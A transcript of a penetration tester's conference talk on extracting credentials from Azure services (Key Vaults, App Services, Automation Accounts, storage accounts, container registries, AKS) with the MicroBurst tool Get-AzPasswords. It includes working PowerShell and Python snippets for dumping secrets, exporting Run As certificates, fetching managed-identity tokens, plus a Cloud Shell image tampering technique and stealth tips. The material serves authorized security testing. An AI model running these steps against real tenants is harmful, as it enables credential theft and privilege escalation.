Welcome to Extracting All the Azure Passwords. I'm Karl Fosaaen. If you're watching this right now, it means I've had some catastrophic issue with my laptop and wasn't able to join the live stream to present this live, but all of the information and slides are here, and I will join for the Q&A at the end. So please save any questions for the Q&A section at the end. A little background on myself: I'm a practice director at a company called NetSPI. I currently lead our Pacific Northwest team out of Portland, Oregon, along with our cloud pentesting services, where I primarily focus on Azure pentesting. This whole talk is going to be about Azure and how we can get passwords from it, so that makes sense. I spend a lot of time doing research there, but I also dabble in other cloud platforms: I've spent some time in AWS, GCP, and a handful of other cloud providers, so I consider myself a bit of a cloud enthusiast in my spare time. I'm also a cloud enthusiast as a private pilot; I like to fly, and I try to avoid the clouds myself, but I've spent some time up in the sky as well. The last thing on my list here is author. This is a recent addition for me over the last year or so: I've been co-authoring the Penetration Testing Azure for Ethical Hackers book with David Okeyode. The book will be out in mid-October with Packt Publishing, but if anybody's interested in pre-ordering, it's on Amazon right now, so feel free to check it out there. Otherwise, you can find me on the NetSPI GitHub, where we'll be talking about some of the tools I've released, and I blog on the NetSPI blog. You can also find me on Twitter, where I'm usually talking about things I've contributed to the blog or the GitHub; that's @kfosaaen. So this is a Cloud Village talk.
So I would hope that most folks here understand what Azure is, but for those not as familiar with it, it's Microsoft's cloud provider. From my perspective, and NetSPI's perspective, we're seeing lots of our clients move to the Azure cloud for a number of reasons. The primary driver is really Office 365 services and the integration between on-premises Active Directory, where lots of the clients we work with currently are, and Azure Active Directory, whose structure we'll talk about in a few slides. They're then utilizing the services we'll cover in this talk to either replicate existing services from their on-premises environment or build cloud-native applications and services up in Azure. An important thing to keep in mind is that at certain IAM/RBAC role levels within an Azure tenant, whether in Azure Active Directory or a subscription, there are passwords in multiple different areas. Typically, with Contributor rights, there are multiple services within an Azure subscription that we can pull credentials out of, and we'll be talking about those services today. Before we get too far into the services themselves, I want to make sure everybody's using the same terminology and understands the structure of an Azure tenant. The Azure Active Directory tenant is the top of the organization for an Azure environment, and the tenant is really the core identity provider within Azure. For role-based access control and identity and access management, the identities stored in Azure Active Directory have roles applied, and those roles allow access to different subscriptions, services, and tenant-level roles. And in order to apply a role, you have to have a security principal.
So principals are made up of a number of different identity types within Azure Active Directory. These could be users or guest users. Primary users are accounts that are either part of a synced on-premises Active Directory environment or direct Microsoft-managed accounts, which only live in Azure Active Directory and aren't synced down to an on-premises domain controller. There are some subtle differences between the two, but in general, they're users in Azure Active Directory and we can apply roles to them. Guest users, likewise, are users whose core identity lives in a different tenant; they can be added to your tenant as guests and given access to different services through application roles, custom roles, anything like that. For managed identities, we have system-assigned and user-assigned. A system-assigned identity is tied to the resource itself, whereas a user-assigned identity is more of a subscription-level identity that can then be applied to individual resources. They're kind of inverses of each other, but the core of it is that you can assign a specific identity to a service, like a virtual machine. If we want that virtual machine to have rights within Azure Active Directory or the subscription to access data or make changes, we assign an identity to that virtual machine; the VM gets the token for that identity and can then authenticate to Azure AD or the subscription itself. The last one here is service principals. These are more like application accounts within an Azure Active Directory tenant; you might be familiar with app registrations in the Azure Active Directory tenant.
These are more service-type credentials that are utilized by applications or services as a long-term, or potentially long-term, credential with a static certificate or password that you can rotate. Typically they're used for individual services that don't involve daily user interaction. So to reiterate: these security principals are assigned roles, and those roles grant access within the Azure Active Directory tenant. Going one step down from the tenant to the individual subscriptions: subscriptions can be housed within management groups, management groups can have child management groups, and there are subscriptions underneath those. Within the subscription itself, there are resource groups and resources, and the roles we're going to talk about can be applied at any of the levels you see here on the bottom. Typically, in a normal subscription, we mostly see roles applied at the subscription level or the management group level. If somebody's really, really interested in setting RBAC and IAM controls around their environment, they'll scope things all the way down to individual resources. But from a practical, day-to-day perspective, we usually just see things scoped at the subscription or management group for specific users, cloud engineers or developers, within the subscription or management group we're working with. The primary roles we work with here are Owner, Contributor, and Reader. From our perspective as pentesters, we're often granted Reader-level access to a subscription, as it doesn't allow us to make any changes in the subscription that could potentially cause an issue, modify existing resources, anything like that.
So oftentimes we're initially granted Reader-level access and try to escalate up to, say, Owner of the subscription or up into Azure Active Directory. Contributor on the subscription allows the user to make changes to the resources themselves in the subscription. Contributor is really what we see for the day-to-day users across the board, people like developers or cloud engineers who are making changes in the environment. Typically it's a subscription-level Contributor permission, set so the user can access everything in the subscription. The only difference between Owner and Contributor is that Owners are allowed to make role assignments within the subscription. So if I'm an Owner in the subscription and want to assign another user Contributor, Reader, or another role, I have the rights to do that. Now, roles can be applied at multiple levels, the subscription and management group levels we just talked about, and there are also Azure Active Directory tenant-level roles that we're not really going to cover today because they don't necessarily apply to the subscriptions; that's probably a whole other talk. For the subscription-level roles, there are also service- or application-specific roles, and we'll talk about a couple that are important for gathering passwords in a few slides. For all of the examples in this presentation, just assume that we have Contributor on the subscription we're working with. Again, developers and engineers typically have this role, and it's a very common role to work with in a subscription. Now, some folks are going to say, oh, that's basically admin, you can do everything. That's kind of true; I'd say it's on par with local admin on a workstation in a traditional Active Directory environment.
You've got some power within the specific environment you're in, say the subscription, but overall you don't have tenant-level management. You're not Global Admin on the Azure Active Directory tenant; you don't have rights to add or remove users or anything like that. It's really just, yes, I can create a virtual machine or a Key Vault, and that's typically what we see in a lot of the subscriptions we work with. Alternatively, there are other roles you might gain access to during a pentest. Look out for things like Website Contributor or Storage Account Contributor; we'll have a very specific Log Analytics Contributor example at the end of the presentation. There are multiple service-specific roles you might be able to use to gather credentials from an Azure subscription, and we'll cover how in a minute. So how do we manually access individual credentials? Let's say we have rights to read credentials for a specific service in an Azure subscription. Most of the time I'd recommend just using the Azure portal; you also have options via the CLI or PowerShell to manually grab individual keys or credentials for one-off collection. We'll go through those for each of the different subscriptions, sorry, not subscriptions, resources and services. For each service, we'll talk about manual collection, and then how we automate it with Get-AzPasswords, which we'll cover next. Manual collection is fine if you only have one-off access to the portal, the CLI, or an active session, but from a practical pentester's perspective we want something that can automate all of this collection. So we wrote Get-AzPasswords to automate the collection of passwords out of an Azure subscription.
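As a rough sketch of what that looks like from the operator's side (assuming an authenticated Az PowerShell session; the repo path, subscription ID, and output handling here are illustrative, not the only way to run it):

```powershell
# Assumes Connect-AzAccount has already been run and a local
# clone of the MicroBurst repo exists; paths are illustrative.
Import-Module .\MicroBurst\MicroBurst.psm1

# Point at the subscription we have (at least) Contributor on
Set-AzContext -SubscriptionId '00000000-0000-0000-0000-000000000000'

# Collect everything Get-AzPasswords knows how to gather and save it off
Get-AzPasswords -Verbose | Export-Csv -NoTypeInformation .\azure-passwords.csv
```

The function returns objects, so piping to Export-Csv or Out-GridView for triage is a natural fit.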
It really wraps the Az PowerShell functions to automate that collection, gathering passwords both actively and passively from different services within a subscription. The active side we'll talk about with things like Automation Accounts, where we have to upload a malicious runbook, but the passive configuration gathering is usually just one or two lines of PowerShell to, say, grab a publishing profile from App Services. If you're interested in MicroBurst, we have a number of different functions within the toolset; I've got the link to the NetSPI GitHub here. We've talked about all the different functions at other times, but there are a lot of tools in the toolset for enumerating and attacking different services in Azure subscriptions. The first of these services we'll talk about today is Key Vaults. Now, you may be thinking: okay, we're talking about passwords, Key Vaults store passwords, this makes sense. The service is pretty straightforward: it stores credentials and is used in an Azure subscription to hold secrets, keys, certificates, anything you'd want to protect and keep in a password vault. Manually dumping credentials from this service is also pretty straightforward. You can go into the keys and secrets, if you have access to read them, and just manually show the secret value or download a backup copy of a certificate. The portal actually makes this pretty easy, but it also requires you to have rights to read and list any of those keys or secrets in the access policy. You can see the Add Access Policy button in the bottom right-hand corner here. With Key Vaults, there are individual access policies for the vaults, where you configure individual security principals and set permissions for the Key Vault via the access policy.
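If you'd rather script the manual read than click through the portal, the same steps can be sketched with the stock Az PowerShell cmdlets (vault and secret names are placeholders; -AsPlainText requires a recent Az.KeyVault module, and your principal needs get/list secret permissions in the vault's access policy):

```powershell
# Enumerate the vaults visible to the current context
Get-AzKeyVault | Select-Object VaultName, ResourceGroupName

# List the secrets in one vault
Get-AzKeyVaultSecret -VaultName 'example-vault'

# Read a specific secret's value in cleartext
Get-AzKeyVaultSecret -VaultName 'example-vault' -Name 'example-secret' -AsPlainText
```

On older module versions, the secret value comes back as a SecureString on the returned object instead of supporting -AsPlainText.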
So instead of just saying, hey, all of the contributors have access to list and read the credentials stored in the Key Vault, there's an extra step with Azure Key Vaults where you have to add an access policy in order to access those keys and secrets. By default, when you create a Key Vault, it's not one of those "everybody has access because it's tied into Azure RBAC" situations; you have to add the access policy yourself. During a pentest, we may want to modify that access policy temporarily so we can access the credentials in the vault, and we definitely want to revert those changes after we're done. That is something you can do, and we have functions for it, which we'll talk about on the next slide. It's not a huge impact, but it is something that could be logged in the subscription logs and potentially flagged as malicious activity, so something to watch out for. Additionally, access can be restricted by source IP and network, so things like private endpoint connections restrict where you can actually access the Key Vault from. This is something we don't have automation built into Get-AzPasswords for; changing a private endpoint to a public endpoint is definitely a major state change, and I would not recommend doing that. But it may be something to keep in mind as you're trying to get credentials out of those Key Vaults. From an automation perspective, it's pretty straightforward. With Get-AzPasswords, we utilize the Get-AzKeyVault cmdlet from Az PowerShell to list out all of the Key Vaults. Then, for each vault, we check what the access policy is up front, and if we need to modify it to add get and list permissions for our user, we can do that.
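The temporary access-policy change can be sketched like this with stock Az PowerShell; the vault name and UPN are placeholders, and you'd want to capture the original policies first so you can put everything back:

```powershell
# Snapshot the current access policies so we can revert later
$vault = Get-AzKeyVault -VaultName 'example-vault'
$originalPolicies = $vault.AccessPolicies

# Temporarily grant our own user get/list on keys and secrets
Set-AzKeyVaultAccessPolicy -VaultName 'example-vault' `
    -UserPrincipalName 'tester@example.com' `
    -PermissionsToKeys get,list -PermissionsToSecrets get,list

# ...dump the keys and secrets here...

# Revert: remove the policy we added for ourselves
Remove-AzKeyVaultAccessPolicy -VaultName 'example-vault' `
    -UserPrincipalName 'tester@example.com'
```

Keep in mind both policy changes land in the subscription activity log, as noted above.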
We make a backup of the existing access policies that we can restore at the very end, modify the access policy to give ourselves access, get the keys and secrets, return those to the user through the Get-AzPasswords function, and then return everything to its original state when we're done. Pretty straightforward, and definitely very handy for dumping out Key Vault contents. We can also export certificates to individual files; if you want a PFX file for a certificate, Get-AzPasswords supports that as well. The next service we'll cover is App Services. For those not familiar with App Services, at its core it's an application-hosting service you can use to run web applications and APIs within Azure. In general, we see App Services used primarily for Function Apps, Logic Apps, API endpoints, and more traditional application servers. From a more traditional on-premises environment, let's say you've got an IIS server and want to ship all of your ASP code up to the cloud: you can use Azure App Services as your web server and run all of your application code up in Azure. From a pentest perspective, we're potentially getting into App Services applications through traditional web application vulnerabilities, the most impactful being code execution, which is extremely impactful regardless of where the application is hosted; but from a cloud perspective, it potentially allows us to pivot within the cloud environment. For the App Services themselves, there are frequently passwords stored in configuration files, potentially hard-coded in application configurations or the application files themselves. There are connection strings associated with the App Service, which we'll see in a moment. Additionally, we frequently see configurations stored in Function App files.
One of the common things we run into from a Reader perspective is being able to read those Function App files and parse out any hard-coded credentials. I've quite frequently seen service principal credentials stored there, and we can pull those out to get access to whatever that service principal can reach, say a Key Vault, anything like that. Those are definitely handy. There's also the Azure App Configuration service, which can apply configurations down onto multiple App Services and set standard deployments, things like that; that's also an interesting service to dive into. To manually dump these credentials from an App Services application, we just navigate to the application in the portal, go to the Get Publish Profile link at the top right, and grab the .publishsettings file you can see here. Now, I've redacted all of the passwords, but you can see all of the usernames are $netspi, for the NetSPI App Services application. All of the creds here are a bit of an eye chart, but we've got web credentials, FTP credentials, a number of different credentials we might be able to utilize as an attacker. The credentials we get out of the publish profile would allow us to access the application over FTP, which gives us access to the application code and any configuration files living in the web directory, so we can potentially pull sensitive information out of there, not to mention access to the source code, which could be useful in its own right. In addition, we have web management credentials that allow us to authenticate to the Kudu environment we have up on the screen here. Now, typically you would access that through the Azure portal.
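Pulling the publish profile without the portal is a couple of lines with Az PowerShell (resource group, app, and file names are placeholders):

```powershell
# List the App Services apps in the current subscription
Get-AzWebApp | Select-Object Name, ResourceGroup

# Download the publish profile for one app; the .publishsettings
# file contains the web-deploy and FTP deployment credentials
Get-AzWebAppPublishingProfile -ResourceGroupName 'example-rg' `
    -Name 'example-app' -OutputFile .\example-app.publishsettings
```

The resulting file is XML, so the usernames and passwords can be parsed out programmatically as well as read by eye.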
If you actually go to the SCM link, in this case netspi.scm.azurewebsites.net, and append /basicauth to the end of it, it's a neat workaround trick that lets you use the credentials we identified in that publish profile to access the Kudu interface here. This interface is super handy for getting access to the application itself and the files in it: there's a debug console, a process explorer, and you can get a PowerShell shell, so you can run commands on the App Service itself. From a persistence perspective, I'd recommend pulling down publish profiles for any apps you're able to compromise and using those to keep a presence in that App Services application. Finally, the last thing here is connection strings. By default, if you set a standard connection string for the application to use at the App Services resource level, that connection string also gets pulled down with the publish profile. One thing I want to touch on, if we're able to use that Kudu interface, is potentially using App Services managed identities, that is, an App Services application with a managed identity tied to it, to access Key Vaults. The potential scenario here: let's say we're doing an application pentest against an App Services application, we get command execution or some way to pull a token out of the application, and then, using that token, we can potentially collect Key Vault contents as that managed identity. By hitting the metadata service for the App Services application, we're able to pull back a token; we have to get tokens scoped for the management level and the Key Vault level. We'll talk about some specifics later on, but basically you scope out tokens, and you can use the MicroBurst Get-AzKeyVaultKeysREST or Get-AzKeyVaultSecretsREST functions to collect keys and secrets out of the vault via the REST APIs.
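From code execution inside the App Service (say, the Kudu PowerShell console), the token fetch can be sketched against the App Service managed identity endpoint. The environment variables are set by the platform; the vault name below is a placeholder, and this only works if the app actually has a managed identity with rights on the vault:

```powershell
# App Service exposes the managed identity endpoint via env vars
$uri = "$($env:IDENTITY_ENDPOINT)?resource=https://vault.azure.net&api-version=2019-08-01"
$token = (Invoke-RestMethod -Uri $uri `
    -Headers @{ 'X-IDENTITY-HEADER' = $env:IDENTITY_HEADER }).access_token

# Use the token directly against the Key Vault REST API
$secrets = Invoke-RestMethod `
    -Uri 'https://example-vault.vault.azure.net/secrets?api-version=7.3' `
    -Headers @{ Authorization = "Bearer $token" }
$secrets.value | Select-Object id
```

A second token scoped to https://management.azure.com/ can be requested the same way for enumerating which vaults exist in the first place.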
So it is super handy, because we frequently see App Services configured with managed identities, those identities having rights in a Key Vault access policy, and Key Vaults potentially storing sensitive information for the application. Again, dumping all of this information is pretty simple: we list out all of the available App Services apps, pull down the publishing profile for each app, parse the profiles for any credentials, and return those back to the user from Get-AzPasswords. Next up is Automation Accounts, one of my personal favorites within Azure. Automation Accounts are a service that basically runs serverless code for you to automate management and other tasks you'd want to handle within an Azure subscription. We see Automation Accounts doing all sorts of things in the subscriptions we deal with, but primarily things like spinning virtual machines up or down for cost management, or update management, applying updates to any machines that need them in the Azure virtual machine infrastructure. There are lots of other things you can integrate Automation Accounts with, but in order to utilize Automation Accounts to do things in the subscription, we frequently run into credentials tied to the Automation Account itself. These can be cleartext credentials that end up hard-coded in a runbook. This is bad, not a good practice, but we do frequently run into it, and as a Reader we can potentially read those runbooks with read-only access and pull the credentials out. There are also platform-level stored credentials, which are stored in the Automation Account itself at the cloud platform level.
There's a section called Credentials where you can store credentials in the Automation Account, and then there are Run As accounts tied to the Automation Account itself. As an Owner of a subscription, we can set an app registration that is tied to the Automation Account. That application, or rather its service principal, is then used as a Run As account and authenticates within the runbook itself with a certificate. We can actually access and extract that credential using a runbook, and we'll show how in just a minute. That's super handy, as Run As accounts are typically set up as Contributor; at least in the default configuration, the Run As account is a Contributor on the subscription. And from a Key Vaults perspective, if any Key Vaults are being called from the Automation Account, typically with Run As accounts, we can potentially use that Run As account to access the Key Vaults; we'll talk about that in a later slide. Doing the password dumping manually here, we can utilize the runbooks themselves. We can view a runbook very simply by hitting the View button and reviewing its source. Then, to actually pull out the stored credentials, we have to get a little more complicated with our PowerShell code. In the screenshot you can see two different sections for pulling out credentials: the top one is for the stored credentials at the platform level, the bottom is for the Run As certificates. We don't need to go line by line, but the core of the top section is: we get the credential, cast it out to username and password variables, and write those out to the runbook output. From a manual perspective, I'd definitely recommend running this in the test pane itself.
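The runbook code just described boils down to a few lines. This is a sketch that runs inside the Automation runbook sandbox, not locally; the stored credential name and export password are placeholders (the Run As certificate is conventionally named AzureRunAsCertificate):

```powershell
# --- Stored (platform-level) credentials ---
# Get-AutomationPSCredential is an internal Automation cmdlet
$cred = Get-AutomationPSCredential -Name 'StoredCredName'
$user = $cred.UserName
$pass = $cred.GetNetworkCredential().Password
Write-Output "$user : $pass"

# --- Run As certificate extraction ---
$runAsCert = Get-AutomationCertificate -Name 'AzureRunAsCertificate'
# Export to PFX bytes, then base64 so it survives in the job/test-pane output
$pfxBytes = $runAsCert.Export(
    [System.Security.Cryptography.X509Certificates.X509ContentType]::Pfx,
    'ExportPassword123')
Write-Output ([Convert]::ToBase64String($pfxBytes))
```

Client-side, the base64 blob gets decoded back to a .pfx file, which can then be used to authenticate as the app registration tied to the Run As account.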
If you've got Contributor rights and the ability to write a runbook, I would just write a temporary runbook, run it in the test pane, which we'll see in the next slide, and look at the output there. Some of that will be logged, but it won't be run as a job, so the output won't be stored in a job, which makes it a little more stealthy. With the Run As certificate extraction, we don't need to dive too deep, but essentially we get the certificate associated with the Run As account, export it to a PFX file, and base64-encode it; then you can take that base64, write it back out to a file on your end, and later use it to authenticate as the app registration tied to that Run As account. In the test pane here, we can see at the top we had test:test as a credential, and we can see the "MII", the start of the base64 certificate, out in the test pane. Now, from a practicality standpoint, you're probably looking at this and going: oh, I don't want to have to manually put in a runbook like this and deal with all of that. So we've automated this within Get-AzPasswords, and we've also protected those credentials, as we'll see in a moment. As I mentioned, protecting the credentials: if we were to run an Automation Account runbook and export usernames, passwords, or anything sensitive from that Automation Account, that could potentially be dumped out in cleartext in the output of the Automation Account job. We run that runbook, we've got cleartext credentials in the output, and someone with Reader permissions could read that job's output and get access to credentials they shouldn't have access to. As pentesters, we don't want to leave an environment worse than we found it, so we want to make sure we're protecting that data in the output. That doesn't necessarily apply to the test pane, as we talked about earlier.
So what we're going to do is encrypt that output with a certificate so we don't have to worry about leaving cleartext credentials in the output. From a MicroBurst perspective, we just generate a cert locally, upload it with the malicious runbooks, and then decrypt everything when it comes back down client-side. One thing I want to touch on here, similar to what we covered in the App Services section, is utilizing the Run As accounts to get access to Key Vaults. In a very similar way to managed identities with App Services, we can use Run As accounts that may have Key Vault permissions to read keys and secrets out of a Key Vault. We've written automation into MicroBurst with the Get-AzKeyVaultsAutomation function to upload a malicious Automation Account runbook that lists all of the Key Vaults and pulls out any available keys, certificates, anything like that. This was technically addressed by Microsoft with a CVE; there were some default configurations associated with it, and we put out a blog post that goes into more detail and explains all of that, so we don't need to cover it here. But something to keep in mind as you get access to Automation Accounts is that you may be able to hit Key Vaults from that Automation Account. Doing this with Az PowerShell is certainly easier, but this is one of the more active gatherings of credentials. We're not pulling down a single configuration here; we're actually actively running runbooks in the Automation Account to pull out credentials. So for each of the Automation Accounts, we list out the available credentials, the connections or Run As accounts, and then upload the malicious runbooks. With Get-AzPasswords, we have everything randomly named for the runbooks.
So it'll be pretty easy to identify which runbooks are ours, and that way we don't have to worry about naming conflicts or getting confused about which runbook we're running in the subscription. We get the output from the job output, delete the runbooks from the Automation Account, and then create a local authentication script to utilize the Run As certificates, which we'll see at the end of the demo. One quick note about running Get-AzPasswords against Automation Accounts: avoid hitting Ctrl+C to stop the PowerShell function midway through dumping credentials, since we're uploading runbooks to the Automation Account. If we stop the function before we're able to delete a runbook, you end up with orphaned runbooks in the Automation Account that need to be cleaned up after the fact. Again, we don't want to leave the environment worse than we found it, so we want to make sure we clean up after ourselves in the Automation Accounts. If your computer crashes or something else happens, there's nothing you can really do at that point other than go in and manually delete the runbooks. But it's something to look out for, because I've definitely had that problem in the past when I thought a runbook was never going to end, and I've spent plenty of time waiting for runbooks to complete. Moving on to storage accounts. Storage accounts are pretty aptly named for what they do: they're a file storage service in the Azure cloud. There are multiple different types of files and areas within the storage accounts themselves, but at a high level, we've got storage account keys that allow us to gain access to the storage accounts through things like Azure Storage Explorer, and underneath that, we can access things like files, queues, tables, and blob storage.
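The storage-key dump mirrors what the portal shows; with stock Az PowerShell it's one call per account:

```powershell
# Enumerate storage accounts, then pull the keys for each one
foreach ($sa in Get-AzStorageAccount) {
    Get-AzStorageAccountKey -ResourceGroupName $sa.ResourceGroupName `
        -Name $sa.StorageAccountName |
        ForEach-Object { "$($sa.StorageAccountName) $($_.KeyName): $($_.Value)" }
}
```

Either key can then be plugged into Azure Storage Explorer (or the Az.Storage data-plane cmdlets) to browse the account's blobs, files, queues, and tables.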
In addition to that, the files stored within the storage accounts may themselves contain credentials. With access to a storage account, you may be able to pull out configuration files or read other sensitive information in that storage account. This isn't really easy to automate, so we'd recommend doing that part manually anyway. It typically requires Contributor access to actually get to the files themselves; this breaks down into data-plane versus management-plane permissions and access to the storage account keys, but we don't need to dive too deep into that. As for getting the storage account keys, to load up something like Azure Storage Explorer and gain access to the storage account, they're available in the portal. They're also really easy to rotate: if they're ever compromised, or you just want to rotate a key regularly, it's that simple recycle button down there. One thing to note about storage accounts is that they are used by Cloud Shell, and we've got a blog post linked at the bottom here that covers all the specifics of this attack. If you're utilizing Cloud Shell within Azure, anyone with Contributor access to the storage account associated with the Cloud Shell could potentially overwrite the image file that gets mounted up in Cloud Shell, run commands, and gain access to another account within the subscription. So if we have a global admin utilizing Cloud Shell, and another user who is a Contributor on the subscription where the Cloud Shell files for that global admin are stored, that other contributor could potentially get access to the global administrator's Cloud Shell. Now, there are restrictions you can put in place to help protect those Cloud Shell files, and Microsoft has some good recommendations on how to lock them down.
But in general, we recommend against using privileged accounts with Cloud Shell, as that could allow for privilege escalation. The process is pretty straightforward: you get access to the IMG file for the Cloud Shell itself and modify both the Bash and PowerShell startup files. I'd recommend doing both, because you don't necessarily know which Cloud Shell a user is going to use. Once those startup files are modified, you re-upload the image to the file share that hosts the Cloud Shell files, and the next time Cloud Shell is opened, your commands are executed as that victim user. It's not necessarily the most practical attack in the book: it takes a while to download that five-gigabyte IMG file to modify it, and there's no guarantee that the privileged account is going to log in with Cloud Shell again. You could potentially phish somebody with the Cloud Shell URL and get them to visit Cloud Shell; it is a legitimate link, and the second they open it up, those startup scripts kick off. So you might have some luck there, but mileage may vary. One other note: those IMG files may contain sensitive files themselves, maybe a setup script the user stored within Cloud Shell, so definitely take a look at those files as well; you might be able to pull out credentials there. Back to actually pulling passwords out of the service itself: it's basically ten lines in Get-AzPasswords, and that's being generous. If I got rid of some extra blank lines, we could probably cut it down to three or four. You get the list of storage accounts, and for each account, get the keys. Two commands, very simple, and it's really easy to review in Get-AzPasswords. The next thing we want to cover is Azure Container Registries. This service stores container images for container-related services in Azure.
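Under the hood, "get the list, then get the keys for each account" maps to a single ARM REST call per storage account: a POST to the listKeys action. A hedged Python sketch that only builds the request rather than sending it, with placeholder subscription, resource group, and account names, and an API version that's my assumption rather than whatever Get-AzPasswords uses internally:

```python
# Builds the ARM listKeys request for a storage account. The subscription
# ID, resource group, and account name below are placeholders, and the
# api-version is an assumption for illustration.
API_VERSION = "2021-04-01"

def list_keys_request(sub_id, rg, account):
    url = (
        f"https://management.azure.com/subscriptions/{sub_id}"
        f"/resourceGroups/{rg}/providers/Microsoft.Storage"
        f"/storageAccounts/{account}/listKeys?api-version={API_VERSION}"
    )
    # listKeys is a POST authorized with a bearer token; no body is needed.
    return {"method": "POST", "url": url,
            "headers": {"Authorization": "Bearer <token>"}}

req = list_keys_request("00000000-0000-0000-0000-000000000000",
                        "demo-rg", "demostorage")
print(req["url"])
```

The `<token>` placeholder stands in for an ARM access token; with one, iterating this call over every storage account in the subscription is the whole "two commands" loop.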
Technically, you could use the Container Registry outside of Azure itself to store container images for anything you might use images for, but in general we mostly see Azure Container Registries tied into things like AKS or individual Container Instances in Azure. From a passwords perspective, you can find credentials in the container images themselves. As a Reader on the subscription, you should be able to pull down any of the container images and then parse those for credentials. It seems like a weird ability to have as a Reader, but you're actually able to connect to the registry with Docker, list out the available images, and pull any of them down. And we frequently see images containing credentials: service principal passwords or certificates, all sorts of things that could be utilized by the container itself to act in the Active Directory tenant or within the subscription. So definitely look at those images if you've got at least Reader access to an ACR. Additionally, there are ACR admin credentials that can be exported, either from a persistence perspective or just for being an admin of the container registry. We can see in the screenshot here that we've got a registry named NetSPI, we've enabled the admin user, the username is set to netspi, and we have passwords for it. Those are long gone, so don't bother trying to authenticate with them. In terms of automating this, it's not super easy to automate pulling down containers and parsing those images for any available credentials, but as we talked about, that only requires Reader. From an automation standpoint for the ACR admin credentials, there are specific commands to do it, and it's very simple; alternatively, these are available in the portal. So, much like storage accounts, it's a very straightforward "get the list, and for each registry in the list, get the credentials."
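Since parsing pulled images for secrets is the manual part, here's a rough sketch of the kind of grep you'd run over extracted layer contents. The file set and regexes are purely illustrative, not something from Get-AzPasswords:

```python
import re

# Illustrative extracted-layer contents (path -> file text). In practice
# you'd walk the files unpacked from each image layer tarball.
layer_files = {
    "app/.env": "CLIENT_ID=abc123\nCLIENT_SECRET=s3cr3t-value\n",
    "app/main.py": "print('hello')\n",
}

# Rough patterns for service principal style credentials; tune as needed.
PATTERNS = [re.compile(p, re.IGNORECASE)
            for p in (r"client[_-]?secret", r"password\s*=", r"connectionstring")]

def find_secret_files(files):
    hits = []
    for path, text in files.items():
        if any(p.search(text) for p in PATTERNS):
            hits.append(path)
    return sorted(hits)

print(find_secret_files(layer_files))  # → ['app/.env']
```

Real secret scanners cast a much wider net (entropy checks, known key formats), but even a keyword pass like this tends to surface the service principal secrets baked into images.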
So one of the services supported by the container registries is AKS, Azure Kubernetes Service, and this can contain passwords in a couple of different spots that we'll go over today. The service runs container images within Azure in a Kubernetes cluster that gets spun up underneath AKS. Passwords can be in the virtual machines that support the clusters themselves; we'll talk about how to extract those from the clusters in a minute, because that's a fairly active process, not just a manual "grab something and get the credentials." We can either get service principal credentials in cleartext, or a managed identity token that we can utilize elsewhere with the REST APIs. Additionally, AKS admin credentials can be exported for persistence from a kubectl perspective, so we can run commands on the clusters after the fact and manage the AKS clusters with that as well. Doing this manually is kind of a pain, whether you're going after the credentials inside the cluster or the kubeconfig files. One handy trick I wanted to mention, since we talked about Cloud Shell previously: if you have access to either another user's Cloud Shell files or a Cloud Shell itself, plus Contributor-level access, you can use the `az aks get-credentials` command in the Azure CLI to get the kubeconfig file, cat it out from the Cloud Shell, and copy it off to another system to use for accessing the cluster. If you use the `--admin` flag on that command, which we see in the screenshot at the top, you can get the cluster admin credentials. It's not the easiest thing to do; it's kind of a pain and takes a couple of extra steps. Honestly, I just recommend using Get-AzPasswords if the kubeconfig files are what you're after, but it is an option if that's something you want to do.
So from an automation perspective, we can use the Get-AzAksCluster command to list all of the clusters, and then for each cluster we actually need to use the REST APIs to get the kubeconfig files we just talked about. There's not really good support in the Az PowerShell cmdlets for pulling out those configuration files; the easiest way I found was to use Get-AzAccessToken to get a REST API token, then reach out to the REST APIs and grab the kubeconfig files. So it branches out a bit from our standard practice in Get-AzPasswords: we're not strictly using the Az PowerShell cmdlets, but using them alongside the REST APIs. Now, if the cluster itself is configured with a service principal, we can access those cleartext credentials in the azure.json file under the /etc/kubernetes folder. That one's really interesting. The cluster is supported by virtual machine scale sets, which are created in a special resource group named after the cluster and the resource group the cluster is deployed into, and it's pretty easy to identify that virtual machine scale set from the Az PowerShell cmdlets. Then, using the run command feature for the virtual machine scale set, we can just issue a cat command for the azure.json file, read the cleartext credentials out of the command output, and get access to the service principal credentials. Alternatively, if the cluster is using a managed identity instead, we can use that same Invoke-AzVmssVMRunCommand approach to query the instance metadata service from the cluster, get back a managed identity token, and go from there.
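The REST call in question is the listClusterAdminCredential (or listClusterUserCredential) action on the managed cluster, which returns base64-encoded kubeconfigs. A Python sketch against a canned response, since the endpoint shape is the interesting part; the resource IDs are placeholders and the api-version is my assumption:

```python
import base64

# api-version is an assumption for illustration.
API_VERSION = "2021-05-01"

def admin_cred_url(sub_id, rg, cluster):
    # POST to this URL with a bearer token returns the cluster kubeconfigs.
    return (
        f"https://management.azure.com/subscriptions/{sub_id}"
        f"/resourceGroups/{rg}/providers/Microsoft.ContainerService"
        f"/managedClusters/{cluster}/listClusterAdminCredential"
        f"?api-version={API_VERSION}"
    )

# Canned response in the documented shape: kubeconfigs come back base64-encoded.
sample_response = {
    "kubeconfigs": [
        {"name": "clusterAdmin",
         "value": base64.b64encode(b"apiVersion: v1\nkind: Config\n").decode()}
    ]
}

def decode_kubeconfigs(resp):
    return {k["name"]: base64.b64decode(k["value"]).decode()
            for k in resp["kubeconfigs"]}

configs = decode_kubeconfigs(sample_response)
print(configs["clusterAdmin"].splitlines()[0])  # → apiVersion: v1
```

Once decoded, that kubeconfig can be written to disk and handed straight to kubectl, which is essentially what the Get-AzPasswords automation does for you.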
So, a quick demo here; this is a recording of a recording, but we can see up at the top that we've imported the MicroBurst modules, which include the Get-AzPasswords function. We recommend using the Verbose flag here, and we're also using the ModifyPolicies and ExportCerts options, so we'll modify any Key Vault access policies we need to in order to get into a Key Vault, and any certificates in the Key Vault will be written out to PFX files in the directory we're running the function from. We can see that we're getting Key Vault items, App Services configurations, Container Registry credentials, and storage account keys, and the Automation Accounts are running the Run As certificate gathering. Let's see, what else? Cosmos DB, which we didn't really talk about, but that one's super basic; we don't need to dive too far into it. We can see here we've got a PFX file along with the AzureRunAsConnection PS1 file that we can use to authenticate as that Run As account, and we exported all of this to Out-GridView. I recommend either using this or piping everything to Export-Csv in PowerShell, so you have slightly more persistent storage of those credentials if you need it, but sending them to grid view is also pretty handy for a quick review of all the credentials we have access to. We scrolled through the top ones pretty quickly, but we've got all of the credentials we talked about during the slides, and down here at the bottom we've got the AKS cluster service principal, where you can see the client secret. It's a little truncated here, but we have the client ID tied to it as well, so you could authenticate as that service principal, plus a handful of other credentials. This entire environment has been burned down, so none of these credentials should work.
